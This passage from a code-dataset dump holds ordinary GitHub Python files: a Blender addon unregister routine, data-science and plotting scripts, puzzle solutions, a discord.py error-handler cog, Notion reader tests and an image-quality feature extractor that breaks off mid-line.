operators\n\tbpy.types.TOPBAR_MT_file_export.remove(sh_draw_export)\n\tbpy.types.TOPBAR_MT_file_export.remove(sh_draw_export_gz)\n\tbpy.types.TOPBAR_MT_file_export.remove(sh_draw_export_auto)\n\tbpy.types.TOPBAR_MT_file_export.remove(sh_draw_export_test)\n\t\n\t# Remove import operators\n\tbpy.types.TOPBAR_MT_file_import.remove(sh_draw_import)\n\tbpy.types.TOPBAR_MT_file_import.remove(sh_draw_import_gz)\n\t\n\t# Remove editor menu UI\n\tbpy.types.VIEW3D_MT_editor_menus.remove(SHATTER_MT_3DViewportMenu_draw)\n\t\n\t# Delete property types\n\tdel bpy.types.Scene.sh_properties\n\tdel bpy.types.Scene.shatter_autogen\n\tdel bpy.types.Object.sh_properties\n\t\n\t# Delete keymaps\n\tfor a, b in keymaps_registered:\n\t\ta.keymap_items.remove(b)\n\t\n\tkeymaps_registered.clear()\n\t\n\t# Unregister classes\n\tfor cls in reversed(classes):\n\t\t# Blender decided it would be a piece of shit today \n\t\ttry:\n\t\t\tunregister_class(cls)\n\t\texcept RuntimeError as e:\n\t\t\tprint(f\"Blender is being a little shit while unregistering class {cls}:\\n\\n{e}\")\n\t\n\t# Shutdown server\n\tglobal g_process_test_server\n\t\n\tif (g_process_test_server):\n\t\tg_process_test_server.terminate()\n","repo_name":"Shatter-Team/Shatter","sub_path":"addon/shatter/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":59104,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"71"}
+{"seq_id":"30266959135","text":"from sklearn import svm\n\nX = [[0, 0], [1, 1]]\ny = [0, 1]\nclf = svm.SVC()\nclf.fit(X, y)\n\nclf.predict([[2., 2.]])\n\nclf.support_vectors_\n\nclf.support_\n\nclf.n_support_\n","repo_name":"codingWithAndy/Thesis_Project","sub_path":"Additional Content/Exploring/ML Testing Code/boundary examples.py","file_name":"boundary examples.py","file_ext":"py","file_size_in_byte":164,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"}
+{"seq_id":"71122652390","text":"from astropy.io import fits\nimport numpy as np\nfrom astropy.table import join\n\nfields = ['goodsn','goodss','egs']#\n# for field in fields:\n# \thdu = fits.getdata('/Users/lpr/Data/lirg_project/output/catalog_radec/'+field+'_match_candels_van.fits',1)\n# \thuang = fits.getdata('/Users/lpr/Data/lirg_project/intake/huang_catalog/'+field+'_Huang_all.fits',1)\n# \thuang = huang[np.isin(huang['id'],hdu['id'])]\n# \tdata = join(hdu,huang,keys_left='id',keys_right='ID')\n# \tdata.write('/Users/lpr/Data/lirg_project/output/catalog_radec/'+field+'_Huangall_candels_van.fits',overwrite=True)\n# van_path = '/Users/lpr/Data/lirg_project/intake/3dhst/3dhst/'\n# van_ctg_name = {'goodsn':'goodsn','goodss':'goodss','egs':'aegis'}\n# for field in fields:\n# \thdu = fits.getdata('/Users/lpr/Data/lirg_project/output/catalog_radec/'+field+'_Huangall_candels_van.fits',1)\n# \tvan = fits.getdata(van_path+van_ctg_name[field]+'/'+van_ctg_name[field]+'_3dhst.v4.1_f160wf125w.fits',1)\n# \tvan = van[np.isin(van['id_van'],hdu['id_van'])]\n# \tdata = join(hdu,van,keys_left='id_van',keys_right='ID_van')\n# \tdata.write('/Users/lpr/Data/lirg_project/output/catalog_radec/'+field+'_Huangall_candels_van_params.fits',overwrite=True)\ndel_id = {'egs':[13011807,12101077,-1,13025385,13011815],'goodss':[2324,7748,16929,17215,15278,16731,16003,14856,14845,13663,13557,13121,12953,12814,12808,12467,11380,12237],'goodsn':[36821,31002,26981,11380,12237,19196,34172,42252,13027]}\nctg_path = '/Users/lpr/Data/lirg_project/output/catalog_radec/'\nfor field in fields:\n\tctg = fits.getdata(ctg_path+field+'_Huangall_candels_van_params_modifyz.fits',1)\n\tidx_list = []\n\tfor num in range(0,len(ctg)):\n\t\tidx = ctg[num]['id']\n\t\tseparation = ctg[num]['Separation_16_candels']\n\t\tz = ctg[num]['z_used']\n\t\tif idx not in del_id[field] and separation <= 1. and z <= 1.3 and z >= 0.8:\n\t\t\tidx_list.append(idx)\n\tidx_list = np.array(idx_list)\n\tcol = fits.Column(name='id',array=idx_list,format='K')\n\thdu = fits.BinTableHDU.from_columns([col])\n\thdu.writeto(ctg_path+field+'_id.fits',overwrite=True)","repo_name":"Lpr-katens/prcode","sub_path":"python/id_list.py","file_name":"id_list.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"5076198587","text":"import dash\nfrom dash.dependencies import Input, Output\nimport dash_html_components as html\nimport dash_core_components as dcc\nimport pandas_datareader as pdr\n\nmy_app = dash.Dash('my app')\n\nmy_app.layout = html.Div([\n html.H1('Hello PlotCon'),\n html.Label('Stock Tickers'),\n dcc.Input(\n value='AAPL',\n id='my-input'),\n dcc.Graph(\n id='my-graph',\n figure={\n 'data': [\n {'x': [1, 2], 'y': [3, 1]}\n ]\n }\n )\n])\n\n\n# update my-graph any time my-input changes\n@my_app.callback(\n Output(component_id='my-graph', component_property='figure'),\n [Input(component_id='my-input', component_property='value')])\ndef update_graph(stock_ticker):\n # stock_ticker = stock_ticker_input.value\n print(stock_ticker)\n df = pdr.get_data_yahoo(stock_ticker.strip('\\n'))\n figure = {\n 'data': [\n {\n 'x': df.index,\n 'y': df.Open\n }\n ]\n }\n # returned value is merged in the 'my-graph' component\n return figure\n\nmy_app.server.run(debug=True)\n","repo_name":"bosr/dash-basic-app","sub_path":"helloworld/helloworld.py","file_name":"helloworld.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"16504720257","text":"from setuptools import setup, find_namespace_packages # type: ignore\n\n\ndef main() -> None:\n pkgs = find_namespace_packages('src')\n pkg = min(pkgs)\n return setup(\n name=pkg,\n zip_safe=False,\n packages=pkgs,\n package_dir={'': 'src'},\n package_data={pkg: ['py.typed']},\n\n install_requires=[\n # my version has some changes not in the upstream yet..\n 'instapaper @ git+https://github.com/karlicoss/instapaper.git',\n ],\n extras_require={\n 'testing': ['pytest'],\n 'linting': ['pytest', 'mypy', 'lxml'], # lxml for mypy coverage report\n 'optional': ['orjson', 'colorlog', 'enlighten'],\n },\n )\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"karlicoss/instapexport","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"71"}
+{"seq_id":"26867450301","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[141]:\n\n\n# 2.요일별 교통량 \n\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom matplotlib import font_manager\n\ndf = pd.read_csv('../rawdata/totally_raw_data_delete_expression.csv', index_col='date')\ndf.index = df.index.astype(str)\ndf.index = pd.to_datetime(df.index, format='%Y-%m-%d')\ndf['week'] = df.index.to_series().dt.dayofweek\nweekday_names = \"월 화 수 목 금 토 일\".split(' ')\n\nfont_path = 'C:\\Windows\\Fonts\\malgun.ttf'\nfont = font_manager.FontProperties(fname=font_path).get_name()\nplt.rc('font', family=font, size=15)\n\nfig, ax = plt.subplots(figsize=(20, 6))\nplt.title('요일별 교통량', loc='center', pad=10)\nplt.rcParams['axes.unicode_minus'] = False\nplt.ylabel('요일별 교통량(합계)')\n\nax.set_xticklabels(weekday_names)\nax.set_xticks(range(0, len(weekday_names)))\n\ndata_for_week = {\n 0: [],\n 1: [],\n 2: [],\n 3: [],\n 4: [],\n 5: [],\n 6: [],\n}\nfor col_name, item in df['week'].iteritems():\n data_for_week[item].append(df['sm_tot_t'].get(col_name))\n\nresult_df_for_week = []\nfor i in range(data_for_week.__len__()):\n result_df_for_week.append(data_for_week[i])\ndf_for_week = pd.DataFrame(result_df_for_week)\n\nax.plot(df_for_week, label='요일별 교통량(합계)')\n\n# plt.show()\nplt.savefig('../image/2_요일별교통량.png', dpi=300)\n","repo_name":"bourbonkk/StatisticDataAnalysis","sub_path":"visualization/2_요일별 교통량.py","file_name":"2_요일별 교통량.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"40439032824","text":"# '''给定两个数组,编写一个函数来计算它们的交集。\n#\n# 示例 1:\n#\n# 输入: nums1 = [1,2,2,1], nums2 = [2,2]\n# 输出: [2]\n# 示例 2:\n#\n# 输入: nums1 = [4,9,5], nums2 = [9,4,9,8,4]\n# 输出: [9,4]\n# 说明:\n#\n# 输出结果中的每个元素一定是唯一的。\n# 我们可以不考虑输出结果的顺序。\n# '''\n#\n#\n# class Solution:\n# def intersection(self, nums1, nums2):\n# \"\"\"\n# :type nums1: List[int]\n# :type nums2: List[int]\n# :rtype: List[int]\n#\n#\n# \"\"\"\n#\n# i = 0\n# j = 0\n# result = []\n# while i < len(nums1) and j < len(nums2):\n# if (nums1[i] > nums2[j]):\n# # result.append(group2[j])\n# j = j + 1\n# elif (nums1[i] < nums2[j]):\n# # result.append(group1[i])\n# i = i + 1\n# elif (nums1[i] == nums2[j]):\n# result.append(nums1[i])\n# i = i + 1\n# j = j + 1\n# result=list(set(result))\n# return result\n#\n# def selectSoft(nums1, nums2):\n# for i in range(0, len(nums1) - 1):\n# index = i\n# for j in range(i + 1, len(nums1)):\n# if nums1[index] > nums1[j]:\n# index = j\n# nums1[i], nums1[index] = nums1[index], nums1[i]\n#\n# for i in range(0, len(nums2) - 1):\n# index = i\n# for j in range(i + 1, len(nums2)):\n# if nums2[index] > nums2[j]:\n# index = j\n# nums2[i], nums2[index] = nums2[index], nums2[i]\n# return nums1, nums2\n#\n#\n# if __name__ == '__main__':\n# group1 = [1, 2, 2, 1]\n# group2 = [2, 2]\n# a = Solution()\n# p = a.intersection(group1, group2)\n# print(p)\nclass Solution:\n def intersection(self, nums1, nums2):\n \"\"\"\n :type nums1: List[int]\n :type nums2: List[int]\n :rtype: List[int]\n \"\"\"\n return list(set(nums1) & set(nums2))\n\n\nif __name__ == '__main__':\n a = Solution()\n n1 = [4, 9, 5]\n n2 = [9, 4, 9, 8, 4]\n p=a.intersection(n1,n2)\n print(p)","repo_name":"coquelin77/PyProject","sub_path":"leetcode/349两个数组的交集.py","file_name":"349两个数组的交集.py","file_ext":"py","file_size_in_byte":2166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"34660425845","text":"from itertools import groupby\nfrom pprint import pprint\n\ndef count_words(text: str, words: set) -> int:\n t_text = text.lower()\n cnt = 0\n for w in words:\n idx = t_text.find(w)\n if idx == -1: continue\n cnt += 1\n t_text.replace(w, '')\n return cnt\n\n\ndef long_repeat_old(line):\n if len(line) == 0: return 0\n t_line = line\n tokens = []\n while len(t_line) > 0:\n need_to_sep = False\n for i in range(len(t_line)):\n if t_line[i] != t_line[0]:\n need_to_sep = True\n break\n if not need_to_sep:\n tokens.append(t_line)\n break\n tokens.append(t_line[:i])\n t_line = t_line[i:]\n result = max([len(tt) for tt in tokens])\n return result\n\n\ndef long_repeat(line):\n if len(line) == 0: return 0\n ch = line[0]\n max_cnt = 1\n current = 1\n for l in line[1:]:\n if l == ch:\n current += 1\n else:\n max_cnt = max(max_cnt, current)\n current = 1\n ch = l\n max_cnt = max(max_cnt, current)\n\n return max_cnt\n\n\ndef two_teams(sailors):\n #replace this for solution\n print('entry')\n result =[\n sorted([k for k in sailors if sailors[k] < 20 or sailors[k] > 40]),\n sorted([k for k in sailors if sailors[k] >= 20 and sailors[k] <= 40])\n ]\n pprint(result)\n return result\n\ndef house(plan):\n p = [list(__) for __ in plan.split()]\n max_r, max_c = 0, 0\n min_r, min_c = 11, 11\n no_hash = True\n # pprint(p)\n for row in range(len(p)):\n if '#' in p[row]:\n max_r, min_r = max(max_r, row), min(min_r, row)\n no_hash = False\n if no_hash: return 0\n\n for col in range(len(p[0])):\n for row in range(len(p)):\n if '#' == p[row][col]:\n max_c, min_c = max(max_c, col), min(min_c, col)\n break\n area = (max_r - min_r + 1) * (max_c - min_c + 1)\n return area\n\nif __name__ == '__main__':\n print(\"Example:\")\n print(house('''\n0000000\n##00##0\n######0\n##00##0\n#0000#0\n'''))\n\n #These \"asserts\" using only for self-checking and not necessary for auto-testing\n assert house('''\n0000000\n##00##0\n######0\n##00##0\n#0000#0\n''') == 24\n\n assert house('''0000000000\n#000##000#\n##########\n##000000##\n0000000000\n''') == 30\n\n assert house('''0000\n0000\n#000\n''') == 1\n\n assert house('''0000\n0000\n''') == 0\n\n assert house('''\n0##0\n0000\n#00#\n''') == 12\n\n print(\"Coding complete? Click 'Check' to earn cool rewards!\")\n\n","repo_name":"hnjang/turbo-octo-couscous","sub_path":"checkio/ground-house/ground-house.py","file_name":"ground-house.py","file_ext":"py","file_size_in_byte":2526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"29072631449","text":"\"\"\"\nError handler\n\n\"\"\"\nimport sys\nimport discord\nimport traceback\nfrom datetime import datetime\n\nfrom discord.ext import commands\nfrom discord import app_commands\nfrom typing import Optional, Iterable\n\nfrom .. import config\nfrom .utils import errors\nfrom ..resources import EMOJIS\n\n\nclass ErrorHandler(commands.Cog):\n def __init__(self, bot: commands.Bot):\n self.bot = bot\n\n bot.tree.error(coro=self.__dispatch_to_app_command_handler)\n\n async def __dispatch_to_app_command_handler(\n self,\n interaction: discord.Interaction,\n error: app_commands.AppCommandError\n ) -> None:\n self.bot.dispatch(\"app_command_error\", interaction, error)\n\n @commands.Cog.listener(\"on_app_command_error\")\n async def get_app_command_error(\n self,\n interaction: discord.Interaction,\n error: app_commands.AppCommandError\n ) -> None:\n \"\"\"\n Override default error handler to send ephemeral messages\n\n Parameters\n ----------\n interaction: discord.Interaction\n error: app_commands.AppCommandError\n\n \"\"\"\n cmd = interaction.command.name\n\n if isinstance(error, errors.MushError):\n info = {'msg': error.msg, 'see_also': error.see_also}\n embed = self.format_error(**info)\n elif isinstance(error.__cause__, discord.Forbidden):\n # CommandInvokeError from e\n embed = self.format_error(errors.MissingPermissions.default_msg)\n else:\n # generic message\n embed = self.format_error(errors.MushError.default_msg)\n print(f'Ignoring exception in command `{cmd}`:', file=sys.stderr)\n traceback.print_exception(type(error), error, error.__traceback__,\n file=sys.stderr)\n\n # determine coro for sending\n error_args = {\n 'embed': embed,\n 'ephemeral': True\n }\n\n if interaction.response.is_done():\n try: # try to get orig message\n orig_msg = await interaction.original_response()\n except discord.NotFound:\n orig_msg = None\n\n if orig_msg and not orig_msg.flags.ephemeral:\n await orig_msg.delete() # delete if not ephemeral\n coro = interaction.followup.send\n else:\n coro = interaction.edit_original_response\n error_args.pop('ephemeral')\n else:\n coro = interaction.response.send_message\n\n await coro(**error_args)\n\n @commands.Cog.listener()\n async def on_command_error(\n self,\n ctx: commands.Context,\n error: commands.CommandError\n ) -> None:\n \"\"\"\n Override default command error\n\n Parameters\n ----------\n ctx: commands.Context\n error: commands.CommandError\n\n \"\"\"\n if not ctx.command: # not command\n return\n\n cmd = ctx.command.qualified_name\n\n if isinstance(error, commands.MissingPermissions):\n embed = self.format_error(str(error))\n elif isinstance(error, errors.MushError):\n info = {'msg': error.msg, 'see_also': error.see_also}\n embed = self.format_error(**info)\n else:\n embed = self.format_error(errors.MushError.default_msg)\n print(f'Ignoring exception in command `{cmd}`:', file=sys.stderr)\n traceback.print_exception(type(error), error, error.__traceback__,\n file=sys.stderr)\n\n try: # try to cleanup the original message\n await ctx.message.delete(delay=10)\n except (discord.Forbidden, discord.NotFound, discord.HTTPException):\n pass\n\n await ctx.send(embed=embed, delete_after=10)\n\n def format_error(\n self,\n msg: Optional[str] = None,\n see_also: Optional[Iterable[str]] = None,\n ) -> discord.Embed:\n \"\"\"\n Format error into an embed\n\n Parameters\n ----------\n msg: Optional[str]\n the message to send in embed\n see_also: Optional[Iterable[str]]\n list of fully qualified command names to reference\n\n Returns\n -------\n discord.Embed\n the embed error\n\n \"\"\"\n # defaults\n msg = msg or f'{config.core.bot_name} failed *cry*'\n msg += '\\n\\u200b'\n\n # send error\n embed = discord.Embed(description=msg, color=config.core.embed_color)\n embed.set_author(name='Error',\n icon_url=self.bot.user.display_avatar.url)\n embed.set_thumbnail(url=self.bot.get_emoji(EMOJIS['mushshock'].id).url)\n\n if see_also:\n fmt = [f'`/{cmd}`' for cmd in see_also]\n embed.add_field(name='See also', value=', '.join(fmt))\n\n return embed\n\n\nasync def setup(bot: commands.Bot):\n await bot.add_cog(ErrorHandler(bot))\n","repo_name":"kerochama/mushmom","sub_path":"mushmom/cogs/error_handler.py","file_name":"error_handler.py","file_ext":"py","file_size_in_byte":4982,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"6528569848","text":"import unittest\nfrom notion_entry_details import NotionEntryDetails\nfrom notion_reader import NotionReader\nimport os\n\nclass NotionReaderTests(unittest.TestCase):\n def test_filter_status(self):\n token = os.environ.get('NOTION_TOKEN')\n notion_reader = NotionReader(token)\n entries = notion_reader.get_entries_to_update(\"https://www.notion.so/Filter-Status-45b97981608f4ce6a36091172b962439\")\n self.assertEqual(1,len(entries))\n \n def test_download_image(self):\n self.assertEqual(1,1)\n\n def test_markdown(self):\n expected = NotionEntryDetails(\n \"93812fac65a14d1eb9033ece651ef2b3\",\n \"title\",\n [\"fuga\"],\n \"# h1\\n\\n## h2\\n\\n### h3\\n\\n- bullet\\n\\n1. one\\n\\n**bold** text\\n\\n[facebook](https://www.facebook.com/) link\\n\\n\",\n []\n )\n token = os.environ.get('NOTION_TOKEN')\n notion_reader = NotionReader(token)\n entries = notion_reader.get_entries_to_update(\"https://www.notion.so/Markdown-70e076df8367476b820f9c5d5b9d2c84\")\n self.assertEqual(expected.__dict__, entries[0].__dict__)\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"rmitsubayashi/notion_blog_to_github_page","sub_path":"test_notion_reader.py","file_name":"test_notion_reader.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"38566117525","text":"from datetime import date, datetime\n\ndef data():\n hoje = date.today()\n dia = hoje.day\n mes = hoje.month\n ano = hoje.year\n \n return (str(dia)+\"/\"+str(mes)+\"/\"+str(ano))\n'''\nmostra a data, dia, mês e ano\n'''\n\ndef hora():\n\n agora = datetime.now()\n horas=agora.hour\n minutos=agora.minute\n segundos=agora.second\n\n return(str(horas)+\":\"+str(minutos)+\":\"+str(segundos))\n'''\nmostra a horas, minutos, e segundos\n'''","repo_name":"Josenildosouza6/proj-embarque","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"38186999622","text":"__author__ = 'id301'\n\n\ndef test_api(setup_task2):\n \"\"\"Отправка запроса'GET https://www.lenvendo.ru/api/js-test-task/?search=Alcatel&sort_field=name'\n Проверка:\n 1. Все поля \"name\" в ответе на запрос содержат значение \"Alcatel\"\n 2. Все элементы в ответе отсортированы по полю 'name' в алфавитном порядке\"\"\"\n products = setup_task2.get_products(search='Alcatel', sort_field='name')\n for product in products:\n assert product.name.count('Alcatel') > 0, f'Поле name не содержит значение \"Alcatel\" в элементе: {product}'\n names = [x.name for x in products]\n assert names == sorted(names), 'Элементы в ответе не отсортированы по полю name в алфавитном порядке'","repo_name":"id301/automationqa_task","sub_path":"tests/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"17109558486","text":"foods = [\"apples\", \"bananas\", \"cherries\", \"donuts\"]\namounts = [11, 22, 33, 44]\n\ndef myfruitCounter(fruit):\n i = foods.index(fruit)\n print('There are {} {}.'.format(amounts[i],fruit))\n\ndef classFruitCounter(fruit):\n # for i, food in enumerate(foods):\n # if food == fruit:\n # print('There are {} {}.'.format(amounts[i], fruit))\n # break\n for food, amount in zip(foods, amounts):\n if food == fruit:\n print('There are {} {}.'.format(amount, fruit))\n break\n\nif __name__ == \"__main__\":\n myfruitCounter(\"apples\")\n classFruitCounter(\"donuts\")","repo_name":"kylemitra/blood-calculator","sub_path":"lecture5Notes.py","file_name":"lecture5Notes.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"10704361826","text":"from student import *\r\n\r\ndef main():\r\n\t\r\n\tmyList = []\r\n\tn = eval(input(\"How many people: \"))\r\n\tfor i in range(n):\r\n\t\tmyList.append(SchoolMember(\"Nick\",4))\r\n\tfor i in range(n):\r\n\t\tmyList.append(Student(\"Patrick\",3, 99))\r\n\tfor i in range(n):\r\n\t\tmyList.append(Teacher(\"Jonas\",8,95000))\r\n\tfor i in range(n):\r\n\t\tmyList.append(Undergrad(\"Melvin\",8,93,35000))\r\n\r\n\tfor person in myList:\r\n\t\tperson.printMember()\r\n\tStudent.printMembers()\r\n\tTeacher.printMembers()\r\n\tUndergrad.printMembers()\r\n\r\n\tinput()\r\n\r\nmain()\r\n","repo_name":"nicholaswang45/Object-Orientated-Python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"70839792221","text":"import cv2\r\nimport math\r\nimport numpy as np\r\nimport os\r\nfrom scipy.ndimage.filters import convolve\r\nfrom scipy.signal import convolve2d\r\nfrom scipy.special import gamma\r\nfrom scipy.ndimage import correlate\r\nimport scipy.sparse.linalg as sla\r\nimport scipy.io\r\nfrom scipy.stats import exponweib\r\nfrom scipy.optimize import fmin\r\nimport time\r\nfrom matlab_resize import MATLABLikeResize\r\nfrom tqdm import tqdm\r\n\r\ndef MyPCA(sampleData, reservedRatio):\r\n principleVectors = []\r\n meanOfSampleData = np.mean(sampleData, axis=1, keepdims=True)\r\n meanMatrix = np.tile(meanOfSampleData,(1,sampleData.shape[1]))\r\n centerlizedData = sampleData - meanMatrix\r\n\r\n covarianceMatrix = np.matmul(centerlizedData.T, centerlizedData)\r\n subSpaceDim = min(sampleData.shape)\r\n reservedPCs = math.floor(subSpaceDim*reservedRatio)\r\n d, tmpEigVectors = sla.eigs(covarianceMatrix,subSpaceDim)\r\n\r\n eigVectors = np.matmul(centerlizedData, tmpEigVectors[:,0:reservedPCs])\r\n for pcIndex in range(reservedPCs):\r\n tmpVector = eigVectors[:, pcIndex]\r\n tmpVector = tmpVector / np.linalg.norm(tmpVector,2)\r\n principleVectors.append(tmpVector)\r\n\r\n principleVectors = np.array(principleVectors).T\r\n projectionOfTrainingData = np.matmul(principleVectors.T, centerlizedData)\r\n\r\n return principleVectors, meanOfSampleData, projectionOfTrainingData\r\n\r\ndef fitweibull(x):\r\n def optfun(theta):\r\n return -np.sum(np.log(exponweib.pdf(x, 1, theta[0], scale = theta[1], loc = 0)))\r\n logx = np.log(x)\r\n shape = 1.2 / np.std(logx)\r\n scale = np.exp(np.mean(logx) + (0.572 / shape))\r\n return fmin(optfun, [shape, scale], xtol = 0.01, ftol = 0.01, disp = 0)\r\n\r\ndef estimate_aggd_param(block):\r\n \"\"\"Estimate AGGD (Asymmetric Generalized Gaussian Distribution) parameters.\r\n\r\n Args:\r\n block (ndarray): 2D Image block.\r\n\r\n Returns:\r\n tuple: alpha (float), beta_l (float) and beta_r (float) for the AGGD\r\n distribution (Estimating the parames in Equation 7 in the paper).\r\n \"\"\"\r\n block = block.flatten()\r\n gam = np.arange(0.2, 10.001, 0.001) # len = 9801\r\n gam_reciprocal = np.reciprocal(gam)\r\n r_gam = np.square(gamma(gam_reciprocal * 2)) / (gamma(gam_reciprocal) * gamma(gam_reciprocal * 3))\r\n\r\n left_std = np.sqrt(np.mean(block[block < 0]**2))\r\n right_std = np.sqrt(np.mean(block[block > 0]**2))\r\n gammahat = left_std / right_std\r\n rhat = (np.mean(np.abs(block)))**2 / np.mean(block**2)\r\n rhatnorm = (rhat * (gammahat**3 + 1) * (gammahat + 1)) / ((gammahat**2 + 1)**2)\r\n array_position = np.argmin((r_gam - rhatnorm)**2)\r\n\r\n alpha = gam[array_position]\r\n beta_l = left_std * np.sqrt(gamma(1 / alpha) / gamma(3 / alpha))\r\n beta_r = right_std * np.sqrt(gamma(1 / alpha) / gamma(3 / alpha))\r\n return (alpha, beta_l, beta_r)\r\n\r\ndef compute_mean(feature, block_posi):\r\n data = feature[block_posi[0]:block_posi[1], block_posi[2]:block_posi[3]]\r\n return np.mean(data)\r\n\r\ndef compute_feature(feature_list, block_posi):\r\n \"\"\"Compute features.\r\n\r\n Args:\r\n feature_list(list): feature to be processed.\r\n block_posi (turple): the location of 2D Image block.\r\n\r\n Returns:\r\n list: Features with length of 234.\r\n \"\"\"\r\n feat = []\r\n data = feature_list[0][block_posi[0]:block_posi[1], block_posi[2]:block_posi[3]]\r\n alpha_data, beta_l_data, beta_r_data = estimate_aggd_param(data)\r\n feat.extend([alpha_data, (beta_l_data + beta_r_data) / 2])\r\n # distortions disturb the fairly regular structure of natural images.\r\n # This deviation can be captured by analyzing the sample distribution of\r\n # the products of pairs of adjacent coefficients computed along\r\n # horizontal, vertical and diagonal orientations.\r\n shifts = [[0, 1], [1, 0], [1, 1], [1, -1]]\r\n for i in range(len(shifts)):\r\n shifted_block = np.roll(data, shifts[i], axis=(0, 1))\r\n alpha, beta_l, beta_r = estimate_aggd_param(data * shifted_block)\r\n # Eq. 8 in NIQE\r\n mean = (beta_r - beta_l) * (gamma(2 / alpha) / gamma(1 / alpha))\r\n feat.extend([alpha, mean, beta_l, beta_r])\r\n\r\n for i in range(1,4):\r\n data = feature_list[i][block_posi[0]:block_posi[1], block_posi[2]:block_posi[3]]\r\n shape, scale = fitweibull(data.flatten('F'))\r\n feat.extend([scale, shape])\r\n\r\n for i in range(4,7):\r\n data = feature_list[i][block_posi[0]:block_posi[1], block_posi[2]:block_posi[3]]\r\n mu = np.mean(data)\r\n sigmaSquare = np.var(data.flatten('F'))\r\n feat.extend([mu, sigmaSquare])\r\n\r\n for i in range(7,85):\r\n data = feature_list[i][block_posi[0]:block_posi[1], block_posi[2]:block_posi[3]]\r\n alpha_data, beta_l_data, beta_r_data = estimate_aggd_param(data)\r\n feat.extend([alpha_data, (beta_l_data + beta_r_data) / 2])\r\n\r\n for i in range(85,109):\r\n data = feature_list[i][block_posi[0]:block_posi[1], block_posi[2]:block_posi[3]]\r\n shape, scale = fitweibull(data.flatten('F'))\r\n feat.extend([scale, shape])\r\n\r\n return feat\r\n\r\ndef matlab_fspecial(shape=(3,3),sigma=0.5):\r\n \"\"\"\r\n 2D gaussian mask - should give the same result as MATLAB's\r\n fspecial('gaussian',[shape],[sigma])\r\n \"\"\"\r\n m,n = [(ss-1.)/2. for ss in shape]\r\n y,x = np.ogrid[-m:m+1,-n:n+1]\r\n h = np.exp( -(x*x + y*y) / (2.*sigma*sigma) )\r\n h[ h < np.finfo(h.dtype).eps*h.max() ] = 0\r\n sumh = h.sum()\r\n if sumh != 0:\r\n h /= sumh\r\n return h\r\n\r\ndef gauDerivative(sigma):\r\n halfLength = math.ceil(3*sigma)\r\n\r\n x, y = np.meshgrid(np.linspace(-halfLength, halfLength, 2*halfLength+1), np.linspace(-halfLength, halfLength, 2*halfLength+1))\r\n\r\n gauDerX = x*np.exp(-(x**2 + y**2)/2/sigma/sigma)\r\n gauDerY = y*np.exp(-(x**2 + y**2)/2/sigma/sigma)\r\n\r\n return gauDerX, gauDerY\r\n\r\ndef conv2(x, y, mode='same'):\r\n return np.rot90(convolve2d(np.rot90(x, 2), np.rot90(y, 2), mode=mode), 2)\r\n\r\ndef logGabors(rows, cols, minWaveLength, sigmaOnf, mult, dThetaOnSigma):\r\n nscale = 3 # Number of wavelet scales.\r\n norient = 4 # Number of filter orientations.\r\n thetaSigma = math.pi/norient/dThetaOnSigma # Calculate the standard deviation of the angular Gaussian function used to construct filters in the freq. plane.\r\n if cols % 2 > 0:\r\n xrange = np.linspace(-(cols-1)/2, (cols-1)/2, cols)/(cols-1)\r\n else:\r\n xrange = np.linspace(-cols/2, cols/2-1, cols)/cols\r\n\r\n if rows % 2 > 0:\r\n yrange = np.linspace(-(rows-1)/2, (rows-1)/2, rows)/(rows-1)\r\n else:\r\n yrange = np.linspace(-rows/2, rows/2-1, rows)/rows\r\n\r\n x, y = np.meshgrid(xrange, yrange)\r\n radius = np.sqrt(x**2 + y**2)\r\n theta = np.arctan2(-y,x)\r\n radius = np.fft.ifftshift(radius)\r\n theta = np.fft.ifftshift(theta)\r\n radius[0,0] = 1\r\n sintheta = np.sin(theta)\r\n costheta = np.cos(theta)\r\n\r\n logGabor = []\r\n for s in range(nscale):\r\n wavelength = minWaveLength*mult**(s)\r\n fo = 1.0/wavelength\r\n logGabor_s = np.exp((-(np.log(radius/fo))**2) / (2 * np.log(sigmaOnf)**2))\r\n logGabor_s[0,0] = 0\r\n logGabor.append(logGabor_s)\r\n\r\n spread = []\r\n for o in range(norient):\r\n angl = o*math.pi/norient\r\n ds = sintheta * np.cos(angl) - costheta * np.sin(angl)\r\n dc = costheta * np.cos(angl) + sintheta * np.sin(angl)\r\n dtheta = abs(np.arctan2(ds,dc))\r\n spread.append(np.exp((-dtheta**2) / (2 * thetaSigma**2)))\r\n\r\n filter = []\r\n for s in range(nscale):\r\n o_list=[]\r\n for o in range(norient):\r\n o_list.append(logGabor[s] * 